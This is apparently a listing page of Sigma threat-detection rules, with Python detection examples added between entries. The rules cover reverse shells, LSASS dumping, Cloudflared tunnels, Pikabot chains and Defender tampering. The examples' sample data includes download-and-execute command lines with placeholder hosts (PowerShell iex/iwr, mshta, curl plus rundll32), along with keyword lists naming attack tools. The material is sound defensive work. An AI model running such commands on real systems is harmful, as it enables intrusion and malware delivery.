    Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

  • Python Reverse Shell Execution Via PTY And Socket Modules

    Nov 4, 2024 · attack.execution

    Detects the execution of python with calls to the socket and pty modules in order to connect and spawn a potential reverse shell.

  • Python Spawning Pretty TTY Via PTY Module

    Nov 4, 2024 · attack.execution attack.t1059

    Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.

  • Antivirus Exploitation Framework Detection

    Nov 4, 2024 · attack.execution attack.t1203 attack.command-and-control attack.t1219

    Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Antivirus Hacktool Detection

    Nov 4, 2024 · attack.execution attack.t1204

    Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Antivirus Password Dumper Detection

    Nov 4, 2024 · attack.credential-access attack.t1003 attack.t1558 attack.t1003.001 attack.t1003.002

    Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Antivirus Ransomware Detection

    Nov 4, 2024 · attack.t1486

    Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Antivirus Relevant File Paths Alerts

    Nov 4, 2024 · attack.resource-development attack.t1588

    Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Antivirus Web Shell Detection

    Nov 4, 2024 · attack.persistence attack.t1505.003

    Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a large web shell repository from e.g. GitHub and checking the matches. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.

  • Monero Crypto Coin Mining Pool Lookup

    calendar Nov 4, 2024 · attack.impact attack.t1496 attack.exfiltration attack.t1567  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DNS queries to Monero mining pools


    Read More
  • .RDP File Created by Outlook Process

    calendar Nov 4, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments.


    Read More
  • Paste sharing url in reverse order

    calendar Nov 4, 2024  ·
    Share on: twitter facebook linkedin copy

    Detects a paste sharing URL written in reverse order.


    Read More
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry

    calendar Nov 1, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.


    Read More
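
    The RunMRU key described above is also a forensic artifact: each lettered value holds one Run-dialog entry terminated by a "\1" marker, and the MRUList value records the order, most recent first. The following is an added example, not the Sigma rule's own logic: it parses a constructed `reg export` of that key, restores the MRU order, and flags entries that contain keywords typical of pasted "ClickFix" commands. The keyword list is an assumption for the example, not the rule's pattern set.

```python
"""Added example (not the Sigma rule's own logic): parse an exported RunMRU key,
order entries by MRUList and flag command lines that look like pasted ClickFix
payloads. The .reg text below is constructed for the example."""
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed `reg export` output: each lettered value holds one Run-dialog entry
# with a trailing "\1" marker, and MRUList gives the order, most recent first.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="mshta https://example.invalid/verify.hta\\1"
"c"="powershell -w hidden -c \"iex (iwr https://example.invalid/c)\"\\1"
'''

# Keywords that commonly appear in pasted ClickFix-style commands. This list is an
# assumption for the example, not the rule's pattern set.
SUSPICIOUS_TOKENS = ("mshta", "-w hidden", "-windowstyle hidden", "-enc", "iex",
                     "invoke-expression", "iwr", "invoke-webrequest", "curl ")

def parse_reg_values(reg_text: str, key: str) -> dict:
    """Return {value_name: data} for one key of a .reg file, unescaping the
    backslash sequences the .reg format uses for backslashes and quotes."""
    values, in_key = {}, False
    for line in reg_text.splitlines():
        if line.startswith("["):
            in_key = line.strip() == f"[{key}]"
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line) if in_key else None
        if m:
            values[m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    return values

def runmru_entries(reg_text: str):
    """Return (letter, command, suspicious) tuples, most recent first."""
    values = parse_reg_values(reg_text, RUNMRU_KEY)
    out = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue
        cmd = data[:-2] if data.endswith("\\1") else data  # strip the "\1" marker
        suspicious = any(tok in cmd.lower() for tok in SUSPICIOUS_TOKENS)
        out.append((letter, cmd, suspicious))
    return out

def flagged_letters(reg_text: str):
    """Letters of the RunMRU entries that matched a suspicious keyword."""
    return [letter for letter, _, sus in runmru_entries(reg_text) if sus]

if __name__ == "__main__":
    for letter, cmd, sus in runmru_entries(SAMPLE_REG_EXPORT):
        print(f"{letter} {'SUSPICIOUS' if sus else 'ok'}: {cmd}")
```

    On a live host the same text comes from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg`; the parser only cares about the lettered values and MRUList.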
  • .RDP File Created By Uncommon Application

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.


    Read More
  • Binary Proxy Execution Via Dotnet-Trace.EXE

    calendar Nov 1, 2024 · attack.execution attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects commandline arguments for executing a child process via dotnet-trace.exe


    Read More
  • Cloudflared Portable Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "cloudflared" binary from a non standard location.


    Read More
  • Cloudflared Quick Tunnel Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.


    Read More
  • Cloudflared Tunnel Connections Cleanup

    calendar Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.


    Read More
  • Cloudflared Tunnel Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1102 attack.t1090 attack.t1572  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.


    Read More
  • Cloudflared Tunnels Related DNS Requests

    calendar Nov 1, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects DNS requests to Cloudflared tunnel domains. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.


    Read More
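
    The Quick Tunnel description above gives a sequence worth correlating: a host that brings up its own tunnel first resolves api.trycloudflare.com and shortly afterwards the freshly generated random subdomain, whereas a user merely browsing to someone else's tunnel only resolves the subdomain. The following is an added example, not one of the Sigma rules listed here: it replays constructed DNS log lines (layout "<timestamp> <host> <qname>" is assumed) and separates likely tunnel creation from plain lookups; the ten-minute window is an assumption.

```python
"""Added example (not a Sigma rule): correlate DNS queries so that a Quick Tunnel
bring-up (api.trycloudflare.com, then a fresh <random>.trycloudflare.com from the
same host) stands out from a host merely resolving someone else's tunnel.
The log lines are constructed; the "<timestamp> <host> <qname>" layout is assumed."""
from datetime import datetime, timedelta

TUNNEL_DOMAIN = "trycloudflare.com"
API_HOST = "api." + TUNNEL_DOMAIN
WINDOW = timedelta(minutes=10)   # assumption: api call and tunnel lookup are close in time

SAMPLE_DNS_LOG = """\
2024-11-01T10:00:01 ws-17 api.trycloudflare.com
2024-11-01T10:00:03 ws-17 quiet-lamp-happy-road.trycloudflare.com
2024-11-01T10:05:00 ws-22 docs-preview.trycloudflare.com
2024-11-01T11:00:00 ws-17 cloudflare.com
2024-11-01T12:30:00 ws-09 api.trycloudflare.com
2024-11-01T13:30:00 ws-09 late-tunnel.trycloudflare.com
2024-11-01T14:00:00 ws-31 nottrycloudflare.com
"""

def is_tunnel_host(qname: str) -> bool:
    """True for trycloudflare.com and its subdomains, false for look-alike names."""
    q = qname.lower().rstrip(".")
    return q == TUNNEL_DOMAIN or q.endswith("." + TUNNEL_DOMAIN)

def parse_log(text: str):
    """Yield (timestamp, host, qname) from the constructed log layout."""
    for line in text.splitlines():
        ts, host, qname = line.split()
        yield datetime.fromisoformat(ts), host, qname.lower()

def correlate_quick_tunnels(text: str):
    """Return (created, observed): tunnels a host most likely created itself, and
    tunnel lookups that had no recent api.trycloudflare.com query from that host."""
    last_api = {}          # host -> time of its most recent api.trycloudflare.com query
    created, observed = {}, []
    for ts, host, qname in parse_log(text):
        if not is_tunnel_host(qname):
            continue
        if qname == API_HOST:
            last_api[host] = ts
        elif host in last_api and ts - last_api[host] <= WINDOW:
            created.setdefault(host, []).append(qname)
        else:
            observed.append((host, qname))
    return created, observed

if __name__ == "__main__":
    created, observed = correlate_quick_tunnels(SAMPLE_DNS_LOG)
    print("likely created by the host:", created)
    print("lookups without a preceding api call:", observed)
```

    Both buckets deserve a look, but the first one is the stronger signal: a workstation that talks to the Quick Tunnel API is running cloudflared itself, which matches the execution rules above.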
  • Compressed File Creation Via Tar.EXE

    calendar Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.


    Read More
  • Compressed File Extraction Via Tar.EXE

    calendar Nov 1, 2024 · attack.collection attack.exfiltration attack.t1560 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "tar.exe" in order to extract a compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.


    Read More
  • Cscript/Wscript Potentially Suspicious Child Process

    calendar Nov 1, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.


    Read More
  • Enable LM Hash Storage

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of the password in Active Directory and the local SAM database.


    Read More
  • Firewall Configuration Discovery Via Netsh.EXE

    calendar Nov 1, 2024 · attack.discovery attack.t1016  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "netsh.exe" to enumerate the firewall configuration. Adversaries may look for details about the network configuration and settings of systems they access, or discover them on remote systems.


    Read More
  • Forfiles.EXE Child Process Masquerading

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.


    Read More
  • HackTool - EDRSilencer Execution

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.


    Read More
  • HackTool - EfsPotato Named Pipe Creation

    calendar Nov 1, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the pattern of a pipe name as used by the hack tool EfsPotato


    Read More
  • HackTool - NoFilter Execution

    calendar Nov 1, 2024 · attack.privilege-escalation attack.t1134 attack.t1134.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of NoFilter, a tool that abuses the Windows Filtering Platform for privilege escalation, based on hardcoded policy name indicators.


    Read More
  • Potential Base64 Decoded From Images

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1140  ·
    Share on: twitter facebook linkedin copy

    Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.


    Read More
  • Potential Direct Syscall of NtOpenProcess

    calendar Nov 1, 2024 · attack.execution attack.t1106  ·
    Share on: twitter facebook linkedin copy

    Detects potential calls to NtOpenProcess directly from NTDLL.


    Read More
  • Potential Persistence Via AppCompat RegisterAppRestart Layer

    calendar Nov 1, 2024 · attack.persistence attack.t1546.011  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.


    Read More
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

    calendar Nov 1, 2024 · attack.execution attack.t1059.003 attack.t1105 attack.t1218 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of concatenated commands via "cmd.exe". Pikabot often runs a combination of commands through the command handler "cmd /c" in order to download and execute additional payloads: "curl" and "wget" fetch the extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "rundll32" executes the malicious DLL files. In the observed Pikabot infections, these commands are combined to orchestrate the download and execution of malicious DLL files.


    Read More
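
    The combination logic described above is easy to state but awkward to express as a single string match, because the interesting signal is which roles appear together in one "cmd /c" chain. The following is an added example and not the Sigma rule's own selection: it splits a command line at cmd.exe's chaining operators, classifies each sub-command by the utilities the description names, and flags a chain that pairs rundll32 with a download or a delay step. The command lines are constructed, with example.invalid placeholders.

```python
"""Added example (not the Sigma rule's own selection): split a "cmd /c" command
line into its concatenated sub-commands, classify each one, and flag the
download/delay + rundll32 combinations described above. The command lines below
are constructed, with example.invalid placeholders."""
import ntpath
import re

# Utilities named in the description, grouped by the role they play in the chain.
ROLE_BY_BINARY = {
    "curl": "download", "wget": "download",
    "ping": "delay", "timeout": "delay",
    "rundll32": "execute",
}

CMD_PREFIX = re.compile(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[cr]\s+(.*)$', re.I | re.S)
SEPARATORS = re.compile(r"\s*(?:&&|\|\||[&|])\s*")   # cmd.exe chaining operators

def cmd_payload(cmdline: str):
    """Return the text after 'cmd /c' (or '/r'), or None if this is not such a line."""
    m = CMD_PREFIX.match(cmdline)
    if not m:
        return None
    payload = m.group(1).strip()
    if len(payload) >= 2 and payload[0] == '"' and payload[-1] == '"':
        payload = payload[1:-1]           # cmd /c "a & b" form
    return payload

def classify(cmdline: str) -> dict:
    """Map each role found in the chain to the sub-commands that play it.
    Caveat: a bare '&' inside a quoted URL is split too; fine for triage."""
    payload = cmd_payload(cmdline)
    if payload is None:
        return {}
    roles = {}
    for segment in SEPARATORS.split(payload):
        parts = segment.strip().split()
        if not parts:
            continue
        binary = ntpath.basename(parts[0].strip('"')).lower().removesuffix(".exe")
        role = ROLE_BY_BINARY.get(binary)
        if role:
            roles.setdefault(role, []).append(segment.strip())
    return roles

def looks_like_pikabot_chain(cmdline: str) -> bool:
    """rundll32 execution combined with a download or a delay step in one chain."""
    roles = classify(cmdline)
    return "execute" in roles and ("download" in roles or "delay" in roles)

SAMPLE_CMDLINES = [  # constructed process command lines
    r'cmd.exe /c ping -n 5 127.0.0.1 & curl -o C:\Users\Public\x.dll http://example.invalid/x & rundll32 C:\Users\Public\x.dll,Enter',
    r'"C:\Windows\System32\cmd.exe" /c "timeout /t 10 && rundll32.exe C:\ProgramData\a.dll,#1"',
    r'cmd.exe /c dir C:\ & echo done',
    r'cmd.exe /c curl -s https://example.invalid/health',
    r'cmd /c ping -n 3 10.0.0.1',
]

def flagged(cmdlines):
    """Subset of command lines that match the combination heuristic."""
    return [c for c in cmdlines if looks_like_pikabot_chain(c)]

if __name__ == "__main__":
    for c in flagged(SAMPLE_CMDLINES):
        print("FLAGGED:", c, classify(c))
```

    A lone curl or a lone ping is deliberately not enough; it is the co-occurrence with rundll32 inside one cmd.exe invocation that carries the signal.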
  • Potential PowerShell Execution Policy Tampering

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution


    Read More
  • Potentially Suspicious AccessMask Requested From LSASS

    calendar Nov 1, 2024 · attack.credential-access car.2019-04-004 attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects a process requesting a handle to the LSASS process with a potentially suspicious access mask.


    Read More
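
    The access mask in a Sysmon Event ID 10 (ProcessAccess) record is a bit field, so the useful first step in triage is to decode it. The page does not list the masks the rule matches; the following is an added example that decodes GrantedAccess with the process access rights from winnt.h and flags LSASS handles carrying memory-read or write rights (or PROCESS_ALL_ACCESS), which is what a credential dumper needs. The events are constructed and the source-image allow-list is an assumption to be replaced with your own baseline.

```python
"""Added example (not the Sigma rule's own mask list): decode the GrantedAccess
value of a Sysmon Event ID 10 record and flag LSASS handles that carry rights a
credential dumper needs. The events are constructed; the allow-list is an assumption."""
import ntpath

# Process-specific access rights from winnt.h plus the standard and SYNCHRONIZE
# bits that together form PROCESS_ALL_ACCESS (0x1FFFFF).
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000004: "PROCESS_SET_SESSIONID",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000100: "PROCESS_SET_QUOTA",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x002000: "PROCESS_SET_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
DUMP_RIGHTS = 0x000010 | 0x000020          # PROCESS_VM_READ | PROCESS_VM_WRITE

# Source images expected to hold wide LSASS handles (assumption for the example).
ALLOWED_SOURCES = {r"c:\windows\system32\wininit.exe", r"c:\windows\system32\csrss.exe"}

def decode_access(mask: int):
    """Names of the rights set in the mask; unnamed bits are reported as hex."""
    names = [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    if unknown:
        names.append(f"0x{unknown:X}")
    return names

def suspicious_lsass_access(events):
    """Return (SourceImage, GrantedAccess, decoded rights) for LSASS handles with
    dump-capable rights from sources outside the allow-list."""
    hits = []
    for ev in events:
        if ntpath.basename(ev["TargetImage"]).lower() != "lsass.exe":
            continue
        if ev["SourceImage"].lower() in ALLOWED_SOURCES:
            continue
        mask = int(ev["GrantedAccess"], 16)
        if mask & DUMP_RIGHTS or mask == PROCESS_ALL_ACCESS:
            hits.append((ev["SourceImage"], ev["GrantedAccess"], decode_access(mask)))
    return hits

LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [  # constructed Sysmon EID 10 fields
    {"SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Tools\procdump64.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS, "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Windows\System32\wininit.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Users\bob\x.exe", "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1010"},
]

if __name__ == "__main__":
    for source, granted, rights in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"{source} {granted}: {', '.join(rights)}")
```

    The 0x1400 handle (query rights only) is the kind of access a task manager or monitoring agent takes and is left alone; 0x1010 is query-limited plus VM_READ, which is enough to read credential material out of the process.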
  • Potentially Suspicious Command Targeting Teams Sensitive Files

    calendar Nov 1, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.


    Read More
  • Potentially Suspicious Desktop Background Change Using Reg.EXE

    calendar Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.


    Read More
  • Potentially Suspicious Desktop Background Change Via Registry

    calendar Nov 1, 2024 · attack.defense-evasion attack.impact attack.t1112 attack.t1491.001  ·
    Share on: twitter facebook linkedin copy

    Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.


    Read More
  • PSScriptPolicyTest Creation By Uncommon Process

    calendar Nov 1, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by PowerShell itself to test against AppLocker policy.


    Read More
  • Renamed Cloudflared.EXE Execution

    calendar Nov 1, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "cloudflared" binary.


    Read More
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder

    calendar Nov 1, 2024 · attack.persistence attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects a file write event to a fake recycle bin folder, which is often used as a staging directory for malware.


    Read More
  • Suspicious Greedy Compression Using Rar.EXE

    calendar Nov 1, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes


    Read More
  • Suspicious Process Execution From Fake Recycle.Bin Folder

    calendar Nov 1, 2024 · attack.persistence attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects process execution from a fake recycle bin folder, often used to evade security solutions.


    Read More
  • Suspicious Wordpad Outbound Connections

    calendar Nov 1, 2024 · attack.defense-evasion attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.


    Read More
  • System Information Discovery Using Ioreg

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "ioreg", which displays I/O Kit registry information and is used for system information discovery. It has been observed in the wild both invoked directly and called from bash in combination with grep to look for specific strings.


    Read More
  • System Information Discovery Using sw_vers

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of "sw_vers" for system information discovery


    Read More
  • System Information Discovery Using System_Profiler

    calendar Nov 1, 2024 · attack.discovery attack.defense-evasion attack.t1082 attack.t1497.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.


    Read More
  • System Integrity Protection (SIP) Disabled

    calendar Nov 1, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of csrutil to disable System Integrity Protection (SIP). This technique is used in post-exploitation scenarios.


    Read More
  • System Integrity Protection (SIP) Enumeration

    calendar Nov 1, 2024 · attack.discovery attack.t1518.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of csrutil to view the System Integrity Protection (SIP) status. This technique is used in post-exploitation scenarios.


    Read More
  • Tamper Windows Defender - PSClassic

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP, or to set its default actions to allow.


    Read More
  • Tamper Windows Defender - ScriptBlockLogging

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP, or to set its default actions to allow.


    Read More
  • Uncommon Child Process Of Conhost.EXE

    calendar Nov 1, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.


    Read More
  • Uncommon File Created In Office Startup Folder

    calendar Nov 1, 2024 · attack.resource-development attack.t1587.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with an uncommon extension in an Office application startup folder


    Read More
  • Uncommon System Information Discovery Via Wmic.EXE

    calendar Nov 1, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.


    Read More
  • BITS Transfer Job Download From File Sharing Domains

    calendar Oct 25, 2024 · attack.defense-evasion attack.persistence attack.t1197  ·
    Share on: twitter facebook linkedin copy

    Detects BITS transfer job downloading files from a file sharing domain.


    Read More
  • Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder

    calendar Oct 25, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.


    Read More
  • New Connection Initiated To Potential Dead Drop Resolver Domain

    calendar Oct 25, 2024 · attack.command-and-control attack.t1102 attack.t1102.001  ·
    Share on: twitter facebook linkedin copy

    Detects an executable that is not an internet browser or a known application initiating network connections to legitimate, popular websites that have been used as dead drop resolvers in previous attacks. In this context attackers leverage well-known sites such as "facebook" or "youtube" in order to pass through undetected.


    Read More
  • Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe


    Read More
  • Suspicious File Download From File Sharing Domain Via Curl.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads from file sharing domains using curl.exe


    Read More
  • Suspicious File Download From File Sharing Domain Via Wget.EXE

    calendar Oct 25, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious file downloads from file sharing domains using wget.exe


    Read More
  • Suspicious File Download From File Sharing Websites - File Stream

    calendar Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the download of a suspicious file type from a well-known file and paste sharing domain


    Read More
  • Unusual File Download From File Sharing Websites - File Stream

    calendar Oct 25, 2024 · attack.defense-evasion attack.s0139 attack.t1564.004  ·
    Share on: twitter facebook linkedin copy

    Detects the download of an unusual file type from a well-known file and paste sharing domain


    Read More
  • HackTool - Certipy Execution

    calendar Oct 8, 2024 · attack.discovery attack.credential-access attack.t1649  ·
    Share on: twitter facebook linkedin copy

    Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.


    Read More
  • Alternate PowerShell Hosts Pipe

    calendar Oct 8, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe


    Read More
  • Disable Windows Defender Functionalities Via Registry Keys

    calendar Oct 8, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when attackers or tools disable Windows Defender functionalities via the Windows registry


    Read More
  • LSASS Process Memory Dump Files

    calendar Oct 8, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.


    Read More
  • Potentially Suspicious JWT Token Search Via CLI

    calendar Oct 6, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects a possible search for JWT tokens via the CLI by looking for the strings "eyJ0eX" or "eyJhbG". These strings are the base64 encoding of the start of a JWT header and serve as an anchor for the tokens used by Microsoft Office and similar apps.


    Read More
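
    The two anchors are not arbitrary: base64 maps every three input bytes to four fixed output characters, so any JWT whose header JSON begins with {"typ" encodes to a string starting "eyJ0eX", and one beginning with {"alg" starts "eyJhbG". The following is an added example, not the Sigma rule's own selection: it derives the anchors from those JSON prefixes and then flags constructed process events in which a search utility is pointed at them. The set of search tools is an assumption for the example.

```python
"""Added example (not the Sigma rule's own selection): derive the "eyJ0eX" and
"eyJhbG" JWT anchors from the header JSON, then use them to flag command-line
searches. The process events are constructed."""
import base64
import ntpath

def jwt_anchor(json_prefix: str) -> str:
    """Base64 turns the first 6 bytes of a JSON header into 8 fixed characters;
    the first 6 of those are a stable anchor for any JWT whose header starts that
    way. For these inputs standard base64 and base64url agree (no '+' or '/')."""
    return base64.b64encode(json_prefix.encode()[:6]).decode()[:6]

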